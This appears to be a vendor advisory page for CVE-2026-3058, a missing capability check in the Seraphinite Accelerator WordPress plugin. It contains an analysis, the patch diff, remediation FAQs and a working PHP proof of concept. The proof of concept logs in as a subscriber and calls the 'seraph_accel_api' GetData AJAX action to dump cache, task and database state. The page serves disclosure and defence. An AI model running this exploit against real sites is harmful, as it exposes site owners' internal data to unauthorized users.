What is CVE-2026-3058?

CVE-2026-3058 is a medium severity vulnerability in the Seraphinite Accelerator plugin for WordPress, affecting versions up to and including 2.28.14. It allows authenticated users with Subscriber-level access to exploit the plugin’s AJAX action to retrieve sensitive operational data.

How does this vulnerability work?

The vulnerability arises from the lack of capability checks in the `OnAdminApi_GetData()` function. Authenticated users can send crafted AJAX requests to the WordPress admin endpoint, allowing them to access sensitive data such as cache status and scheduled tasks.

Who is affected by CVE-2026-3058?

Any WordPress site using the Seraphinite Accelerator plugin version 2.28.14 or earlier is affected. This includes sites with users who have Subscriber-level access or higher.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Seraphinite Accelerator plugin installed. If it is version 2.28.14 or earlier, your site is at risk. Additionally, review user roles to identify any Subscriber-level accounts.

How can I fix CVE-2026-3058?

The vulnerability is patched in version 2.28.15 of the Seraphinite Accelerator plugin. Updating to this version will apply the necessary capability checks and mitigate the risk of sensitive information exposure.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider temporarily disabling the plugin or restricting user access to prevent authenticated users from exploiting the vulnerability. Monitor user roles closely until the update can be applied.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the risk is not critical, it still poses a significant threat that should be addressed promptly to protect sensitive information.

What are the practical implications of this vulnerability?

The practical implications include the risk of unauthorized access to sensitive operational data by low-privileged users. This information could facilitate further attacks or exploitation of the site.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It illustrates the steps needed to authenticate and retrieve sensitive data, confirming the existence of the issue.

What specific data can be exposed due to this vulnerability?

The vulnerability can expose various types of sensitive data, including the cache status, scheduled task information, and the state of external databases. This information can be valuable for attackers.

Is there a way to monitor for exploitation attempts?

To monitor for exploitation attempts, consider implementing logging for AJAX requests and reviewing access logs for unusual patterns. Additionally, security plugins may help detect and alert on suspicious activity.

What should I do after updating the plugin?

After updating the plugin, verify that the capability checks are functioning correctly by testing the AJAX action with different user roles. Regularly review user permissions and keep your plugins updated to prevent future vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-3058: Seraphinite Accelerator <= 2.28.14 – Authenticated (Subscriber+) Exposure of Sensitive Information to an Unauthorized Actor (seraphinite-accelerator)

CVE ID CVE-2026-3058

Plugin seraphinite-accelerator

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 2.28.14

Patched Version 2.28.15

Disclosed March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3058:
The vulnerability is a missing capability check in the `OnAdminApi_GetData()` function within the Seraphinite Accelerator WordPress plugin. This function handles the `seraph_accel_api` AJAX action with the `fn=GetData` parameter. The vulnerable code, located in the `main.php` file, did not verify the user’s permissions before executing. Any authenticated user, including those with the low-privilege Subscriber role, could send a crafted AJAX request to the WordPress `/wp-admin/admin-ajax.php` endpoint. The request required the `action` parameter set to `seraph_accel_api` and the `fn` parameter set to `GetData`. Successful exploitation allowed attackers to retrieve sensitive operational data, including cache status, scheduled task information, and external database state. The patch adds a capability check using `current_user_can(‘manage_options’)` at the beginning of the `OnAdminApi_GetData()` function (line 2310-2312 in the patched `main.php`). This restricts access to users with administrator-level permissions, effectively mitigating the information exposure. The impact is the exposure of internal plugin and system state to low-privileged users, which could aid in further attacks.

Differential between vulnerable and patched code

Code Diff

--- a/seraphinite-accelerator/Cmn/Gen.php
+++ b/seraphinite-accelerator/Cmn/Gen.php
@@ -3654,7 +3654,7 @@
 		if( !isset( $args[ 'provider' ] ) )
 			$args[ 'provider' ] = 'CURL';
 		if( !isset( $args[ 'user-agent' ] ) )
-			$args[ 'user-agent' ] = 'seraph-accel-Agent/2.28.14';
+			$args[ 'user-agent' ] = 'seraph-accel-Agent/2.28.15';
 		if( !isset( $args[ 'timeout' ] ) )
 			$args[ 'timeout' ] = 5;

--- a/seraphinite-accelerator/Cmn/Plugin.php
+++ b/seraphinite-accelerator/Cmn/Plugin.php
@@ -306,7 +306,7 @@
 			$args[ 'epid' ] = Wp::GetSiteId();
 			$args[ 'id' ] = 'wordpress-accelerator';
 			$args[ 'name' ] = 'Accelerator';
-			$args[ 'v' ] = '2.28.14';
+			$args[ 'v' ] = '2.28.15';
 			$args[ 'pk' ] = 'Base';
 			$args[ 'cfg' ] = '';
 			$args[ 'loc' ] = Wp::GetLocale();
@@ -328,11 +328,11 @@
 		if( $lastCheckPackage === null && $lastCheckVer !== null )
 			$lastCheckPackage = 'Base';

-		if( $lastCheckVer !== '2.28.14' || $lastCheckPackage !== 'Base' )
+		if( $lastCheckVer !== '2.28.15' || $lastCheckPackage !== 'Base' )
 		{
 			$state = Plugin::StateGet();

-			if( $lastCheckVer !== '2.28.14' && !isset( $state[ 'changeVerCheck' ] ) )
+			if( $lastCheckVer !== '2.28.15' && !isset( $state[ 'changeVerCheck' ] ) )
 			{
 				$state[ 'changeVerCheck' ] = $lastCheckVer !== null ? $lastCheckVer : '';
 				Plugin::StateSet( $state );
@@ -349,7 +349,7 @@

 		if( !$bForce )
 		{
-			if( $bFirstTimeOnly && $lastCheckVer == '2.28.14' )
+			if( $bFirstTimeOnly && $lastCheckVer == '2.28.15' )
 				return( Gen::S_FALSE );

 			$lastUpdTime = ($data[ 'updTime' ]??null);
@@ -368,7 +368,7 @@
 			$args[ 'epid' ] = Wp::GetSiteId();
 			$args[ 'id' ] = 'wordpress-accelerator';
 			$args[ 'name' ] = 'Accelerator';
-			$args[ 'v' ] = '2.28.14';
+			$args[ 'v' ] = '2.28.15';
 			$args[ 'pk' ] = 'Base';
 			$args[ 'cfg' ] = '';
 			$args[ 'loc' ] = Wp::GetLocale();
@@ -385,7 +385,7 @@
 			if( $data[ 'mdfTime' ] >= $timeMdf )
 			{
 				$data[ 'updTime' ] = $curUpdTime;
-				$data[ 'plgVer' ] = '2.28.14';
+				$data[ 'plgVer' ] = '2.28.15';
 				$data[ 'plgPk' ] = 'Base';

 				$hr = PluginOptions::Set( self::STG_VER, self::STG_ID, $data, __CLASS__ . '::' );
@@ -402,7 +402,7 @@

 		$data[ 'mdfTime' ] = $timeMdf;
 		$data[ 'updTime' ] = $curUpdTime;
-		$data[ 'plgVer' ] = '2.28.14';
+		$data[ 'plgVer' ] = '2.28.15';
 		$data[ 'plgPk' ] = 'Base';

 		if( $timeMdf )
@@ -1459,10 +1459,10 @@
 		$rmtCfg = PluginRmtCfg::Get();

 		$urlProductInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductInfo' );
-		$urlAboutPluginImg = file_exists( __DIR__ . '/../Images/ProductLogo.png' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../Images/ProductLogo.png', __FILE__ ) ) : null;
+		$urlAboutPluginImg = file_exists( __DIR__ . '/../Images/ProductLogo.png' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../Images/ProductLogo.png', __FILE__ ) ) : null;
 		$urlAboutPluginDocs = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductDocs' );
 		$urlAboutPluginSupport = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlProductSupport' );
-		$url3rdPartySoft = file_exists( __DIR__ . '/../third-party-software.html' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../third-party-software.html', __FILE__ ) ) : null;
+		$url3rdPartySoft = file_exists( __DIR__ . '/../third-party-software.html' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../third-party-software.html', __FILE__ ) ) : null;

 		$urlEula = null;

@@ -1471,7 +1471,7 @@
 		$res .= Ui::Tag( 'p' );

 		{
-			$version = esc_html( '2.28.14' );
+			$version = esc_html( '2.28.15' );

 			$res .= Ui::TagOpen( 'div' );

@@ -1520,7 +1520,7 @@
 	{
 		$rmtCfg = PluginRmtCfg::Get();

-		$urlAboutUsLogoImg = file_exists( __DIR__ . '/../Images/VendorLogo.png' ) ? add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( '../Images/VendorLogo.png', __FILE__ ) ) : null;
+		$urlAboutUsLogoImg = file_exists( __DIR__ . '/../Images/VendorLogo.png' ) ? add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( '../Images/VendorLogo.png', __FILE__ ) ) : null;
 		$urlMorePlugins = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlMorePlugins' );
 		$urlMoreInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlMain' );

@@ -2049,7 +2049,7 @@
 				return( null );

 			$verFrom = self::_PrevVer_GetInt( $plgVerPrev );
-			$verTo = self::_PrevVer_GetInt( '2.28.14' );
+			$verTo = self::_PrevVer_GetInt( '2.28.15' );
 			if( $verTo < $verFrom )
 				list( $verTo, $verFrom ) = array( $verFrom, $verTo );

@@ -2174,7 +2174,7 @@
 			if( (self::$g_aAlreadyIncludedObj[ 'css' ][ $id ]??null) )
 				continue;

-			wp_enqueue_style( Plugin::CmnScriptId( $id ), add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.css' ), array(), '2.28.14' );
+			wp_enqueue_style( Plugin::CmnScriptId( $id ), add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.css' ), array(), '2.28.15' );

 			self::$g_aAlreadyIncludedObj[ 'css' ][ $id ] = true;
 		}
@@ -2241,7 +2241,7 @@

 			$scrHndId = Plugin::CmnScriptId( $id );

-			wp_register_script( $scrHndId, add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.js' ), $deps, '2.28.14' );
+			wp_register_script( $scrHndId, add_query_arg( Plugin::GetFileUrlPackageParams(), $fileUrl . '/' . $id . '.js' ), $deps, '2.28.15' );
 			if( $id == 'Gen' )
 				Plugin::Loc_ScriptLoad( $scrHndId );
 			wp_enqueue_script( $scrHndId );
@@ -2686,7 +2686,7 @@

 							var sendDataUrl = "<?php echo( Gen::GetArrField( $rmtCfg, 'Questionnaires.SendAnswerUrlTpl' ) ); ?>";
 							sendDataUrl = sendDataUrl.replace( "{EndPointId}",					encodeURI( "<?php echo( Wp::GetSiteId() ); ?>" ) );
-							sendDataUrl = sendDataUrl.replace( "{PluginVersion}",				encodeURI( "2.28.14" ) );
+							sendDataUrl = sendDataUrl.replace( "{PluginVersion}",				encodeURI( "2.28.15" ) );
 							sendDataUrl = sendDataUrl.replace( "{PluginMode}",					encodeURI( "base" ) );
 							sendDataUrl = sendDataUrl.replace( "{PluginPackage}",				encodeURI( "Base" ) );
 							sendDataUrl = sendDataUrl.replace( "{QuestionnaireId}",				encodeURI( "<?php echo( ($q[ 'id' ]??null) ); ?>" ) );
--- a/seraphinite-accelerator/cache.php
+++ b/seraphinite-accelerator/cache.php
@@ -676,7 +676,7 @@
 		}

 	if( $bHdr )
-		@header( 'X-Seraph-Accel-Cache: 2.28.14;' . $debugInfo );
+		@header( 'X-Seraph-Accel-Cache: 2.28.15;' . $debugInfo );

 	if( $bLog )
 	{
@@ -1583,7 +1583,7 @@
 	if( ($settCache[ 'normAgent' ]??null) )
 	{
 		$_SERVER[ 'SERAPH_ACCEL_ORIG_USER_AGENT' ] = ($_SERVER[ 'HTTP_USER_AGENT' ]??'');
-		$_SERVER[ 'HTTP_USER_AGENT' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14';
+		$_SERVER[ 'HTTP_USER_AGENT' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15';
 	}

 	if( ($settCache[ 'views' ]??null) )
--- a/seraphinite-accelerator/common.php
+++ b/seraphinite-accelerator/common.php
@@ -4169,7 +4169,7 @@

 function GetViewTypeUserAgent( $viewsDeviceGrp )
 {
-	return( 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14 ' . ucwords( implode( ' ', Gen::GetArrField( $viewsDeviceGrp, array( 'agents' ), array() ) ) ) );
+	return( 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15 ' . ucwords( implode( ' ', Gen::GetArrField( $viewsDeviceGrp, array( 'agents' ), array() ) ) ) );
 }

 function CorrectRequestScheme( &$serverArgs, $target = null )
@@ -5473,7 +5473,7 @@

 	$args = array( 'sslverify' => false, 'timeout' => $timeout, 'headers' => array() );
 	if( $userAgentCmn )
-		$args[ 'headers' ][ 'User-Agent' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14';
+		$args[ 'headers' ][ 'User-Agent' ] = 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15';

 	global $seraph_accel_g_aGetExtContentsFailedSrvs;

@@ -5981,7 +5981,7 @@
 	foreach( $aHdrs as $hdrsId => $headers )
 	{
 		if( !isset( $headers[ 'User-Agent' ] ) )
-			$headers[ 'User-Agent' ] = ($headers[ 'X-Seraph-Accel-Postpone-User-Agent' ]??'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14');
+			$headers[ 'User-Agent' ] = ($headers[ 'X-Seraph-Accel-Postpone-User-Agent' ]??'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15');
 		$headers[ 'User-Agent' ] = str_replace( 'seraph-accel-Agent/', 'seraph-accel-Agent-WarmUp/', $headers[ 'User-Agent' ] );

 		if( isset( $headers[ 'X-Seraph-Accel-Geo-Remote-Addr' ] ) )
--- a/seraphinite-accelerator/main.php
+++ b/seraphinite-accelerator/main.php
@@ -41,7 +41,7 @@

 function _AddMenus( $accepted = false )
 {
-	add_menu_page( Plugin::GetPluginString( 'TitleLong' ), Plugin::GetNavMenuTitle(), 'manage_options', 'seraph_accel_manage',																		$accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent', Plugin::FileUri( 'icon.png?v=2.28.14', __FILE__ ) );
+	add_menu_page( Plugin::GetPluginString( 'TitleLong' ), Plugin::GetNavMenuTitle(), 'manage_options', 'seraph_accel_manage',																		$accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent', Plugin::FileUri( 'icon.png?v=2.28.15', __FILE__ ) );
 	add_submenu_page( 'seraph_accel_manage', esc_html_x( 'Title', 'admin.Manage', 'seraphinite-accelerator' ), esc_html_x( 'Title', 'admin.Manage', 'seraphinite-accelerator' ), 'manage_options', 'seraph_accel_manage',	$accepted ? 'seraph_accel\_ManagePage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent' );
 	add_submenu_page( 'seraph_accel_manage', Wp::GetLocString( 'Settings' ), Wp::GetLocString( 'Settings' ), 'manage_options', 'seraph_accel_settings',										$accepted ? 'seraph_accel\_SettingsPage' : 'seraph_accel\Plugin::OutputNotAcceptedPageContent' );
 }
@@ -1285,7 +1285,7 @@
 function _ManagePage()
 {
 	Plugin::CmnScripts( array( 'Cmn', 'Gen', 'Ui', 'Net', 'AdminUi' ) );
-	wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.14' );
+	wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.15' );
 	Plugin::Loc_ScriptLoad( Plugin::ScriptId( 'Admin' ) );
 	wp_enqueue_script( Plugin::ScriptId( 'Admin' ) );

@@ -1527,7 +1527,7 @@
 {
 	$rmtCfg = PluginRmtCfg::Get();

-	$urlLogoImg = add_query_arg( array( 'v' => '2.28.14' ), Plugin::FileUri( 'Images/hosting-icon-banner.svg', __FILE__ ) );
+	$urlLogoImg = add_query_arg( array( 'v' => '2.28.15' ), Plugin::FileUri( 'Images/hosting-icon-banner.svg', __FILE__ ) );
 	$urlMoreInfo = Plugin::RmtCfgFld_GetLoc( $rmtCfg, 'Links.UrlHostingInfo' );

 	$res = '';
@@ -2307,10 +2307,12 @@

 function OnAdminApi_GetData( $args )
 {
+	$res = array();

-	$siteId = !($args[ 'allSites' ]??null) ? GetSiteId() : null;
+	if( !current_user_can( 'manage_options' ) )
+		return( $res );

-	$res = array();
+	$siteId = !($args[ 'allSites' ]??null) ? GetSiteId() : null;

 	if( $siteId )
 	{
@@ -2478,6 +2480,9 @@

 function OnAdminApi_LogClear( $args )
 {
+	if( !current_user_can( 'manage_options' ) )
+		return;
+
 	Gen::LogClear( GetCacheDir() . LogGetRelativeFile(), true );
 }

--- a/seraphinite-accelerator/oper.php
+++ b/seraphinite-accelerator/oper.php
@@ -1215,7 +1215,7 @@

 	foreach( $viewId === null ? array( 'cmn' ) : $viewId as $viewIdI )
 		if( CacheOpViewsHeadersGetViewId( $viewIdI ) == 'cmn' )
-			$res[ $viewIdI ] = array( 'User-Agent' => 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.14' );
+			$res[ $viewIdI ] = array( 'User-Agent' => 'Mozilla/99999.9 AppleWebKit/9999999.99 (KHTML, like Gecko) Chrome/999999.0.9999.99 Safari/9999999.99 seraph-accel-Agent/2.28.15' );

 	if( ($settCache[ 'views' ]??null) )
 	{
--- a/seraphinite-accelerator/options.php
+++ b/seraphinite-accelerator/options.php
@@ -141,7 +141,7 @@
 	}

 	Plugin::CmnScripts( array( 'Cmn', 'Gen', 'Ui', 'Net', 'AdminUi' ) );
-	wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.14' );
+	wp_register_script( Plugin::ScriptId( 'Admin' ), add_query_arg( Plugin::GetFileUrlPackageParams(), Plugin::FileUrl( 'Admin.js', __FILE__ ) ), array_merge( array( 'jquery' ), Plugin::CmnScriptId( array( 'Cmn', 'Gen', 'Ui', 'Net' ) ) ), '2.28.15' );
 	Plugin::Loc_ScriptLoad( Plugin::ScriptId( 'Admin' ) );
 	wp_enqueue_script( Plugin::ScriptId( 'Admin' ) );

--- a/seraphinite-accelerator/plugin_root.php
+++ b/seraphinite-accelerator/plugin_root.php
@@ -5,7 +5,7 @@
 Description: Turns on site high speed to be attractive for people and search engines.
 Text Domain: seraphinite-accelerator
 Domain Path: /languages
-Version: 2.28.14
+Version: 2.28.15
 Author: Seraphinite Solutions
 Author URI: https://www.s-sols.com
 License: GPLv2 or later (if another license is not provided)

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3058 - Seraphinite Accelerator <= 2.28.14 - Authenticated (Subscriber+) Exposure of Sensitive Information to an Unauthorized Actor
<?php
// Configuration
$target_url = 'https://target-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress to obtain a valid session cookie.
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Exploit the vulnerable AJAX endpoint to retrieve sensitive data.
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'seraph_accel_api',
    'fn' => 'GetData'
)));
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Output the sensitive data returned by the plugin.
echo $response;
?>

Frequently Asked Questions

What is CVE-2026-3058?
Overview of the vulnerability
CVE-2026-3058 is a medium severity vulnerability in the Seraphinite Accelerator plugin for WordPress, affecting versions up to and including 2.28.14. It allows authenticated users with Subscriber-level access to exploit the plugin’s AJAX action to retrieve sensitive operational data.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of capability checks in the `OnAdminApi_GetData()` function. Authenticated users can send crafted AJAX requests to the WordPress admin endpoint, allowing them to access sensitive data such as cache status and scheduled tasks.
Who is affected by CVE-2026-3058?
Identifying vulnerable installations
Any WordPress site using the Seraphinite Accelerator plugin version 2.28.14 or earlier is affected. This includes sites with users who have Subscriber-level access or higher.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Seraphinite Accelerator plugin installed. If it is version 2.28.14 or earlier, your site is at risk. Additionally, review user roles to identify any Subscriber-level accounts.
How can I fix CVE-2026-3058?
Updating the plugin
The vulnerability is patched in version 2.28.15 of the Seraphinite Accelerator plugin. Updating to this version will apply the necessary capability checks and mitigate the risk of sensitive information exposure.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider temporarily disabling the plugin or restricting user access to prevent authenticated users from exploiting the vulnerability. Monitor user roles closely until the update can be applied.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the risk is not critical, it still poses a significant threat that should be addressed promptly to protect sensitive information.
What are the practical implications of this vulnerability?
Potential risks to your site
The practical implications include the risk of unauthorized access to sensitive operational data by low-privileged users. This information could facilitate further attacks or exploitation of the site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It illustrates the steps needed to authenticate and retrieve sensitive data, confirming the existence of the issue.
What specific data can be exposed due to this vulnerability?
Types of sensitive information at risk
The vulnerability can expose various types of sensitive data, including the cache status, scheduled task information, and the state of external databases. This information can be valuable for attackers.
Is there a way to monitor for exploitation attempts?
Detecting potential attacks
To monitor for exploitation attempts, consider implementing logging for AJAX requests and reviewing access logs for unusual patterns. Additionally, security plugins may help detect and alert on suspicious activity.
What should I do after updating the plugin?
Post-update actions
After updating the plugin, verify that the capability checks are functioning correctly by testing the AJAX action with different user roles. Regularly review user permissions and keep your plugins updated to prevent future vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations